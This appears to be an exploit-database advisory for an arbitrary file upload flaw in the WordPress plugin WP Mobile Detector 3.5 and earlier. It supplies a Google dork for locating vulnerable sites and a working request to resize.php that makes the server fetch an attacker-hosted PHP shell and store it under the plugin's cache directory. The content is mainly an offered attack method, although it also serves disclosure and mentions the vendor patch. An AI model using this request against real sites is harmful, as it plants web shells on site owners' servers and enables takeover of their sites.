32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
|
|
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
|
|
#Date: 1-06-2015
|
|
#Exploit Author: Aaditya Purani
|
|
#Author Details: https://aadityapurani.com
|
|
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
|
|
#Version: 3.5
|
|
#Tested on: Kali Linux 2.0 Sana / Windows 10
|
|
|
|
|
|
This Vulnerable has been disclosed to public yesterday about WP Mobile
|
|
Detector Arbitrary File upload for version <=3.5 in which attacker can
|
|
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
|
|
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
|
|
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
|
|
|
|
I have wrote a Complete POC post:
|
|
|
|
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
|
|
|
|
I have made a POC Video Here:
|
|
https://www.youtube.com/watch?v=ULE1AVWfHTU
|
|
|
|
Simple POC:
|
|
|
|
Go to:
|
|
|
|
[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
|
|
|
|
and it will get saved in directory:
|
|
|
|
/wp-content/plugins/wp-mobile-detector/cache/shell.php |